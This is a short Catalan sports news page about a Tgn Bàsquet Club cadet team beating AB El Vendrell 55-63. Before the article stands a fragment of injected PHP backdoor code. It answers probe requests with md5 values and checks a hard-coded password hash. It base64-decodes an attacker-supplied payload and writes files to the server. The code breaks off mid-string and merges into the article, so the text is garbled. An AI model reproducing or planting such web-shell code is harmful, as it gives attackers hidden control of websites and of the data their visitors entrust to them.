function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet masculí 03 A aprofita els contraatacs del segon quart per derrotar l'AB El Vendrell (55-63) - Tgn Bàsquet Club -

El cadet masculí 03 A aprofita els contraatacs del segon quart per derrotar l’AB El Vendrell (55-63)

Updated: març 12, 2019

El cadet masculí 03 A va derrotar l’AB Vendrell en un partit on el conjunt lila en va tenir prou en fer un excel·lent segon període per a derrotar el seu rival. En un matx igualat globalment, els nois que entrena Javier García van fer un segon quart molt bo i gràcies a la bona defensa van poder muntar contraatacs molt ràpids que els va permetre anotar amb facilitat (8-20 de parcial). Aquest avantatge va ser suficient per aconseguir el triomf però el TGN Bàsquet va haver de treballar força per administrar la diferència favorable.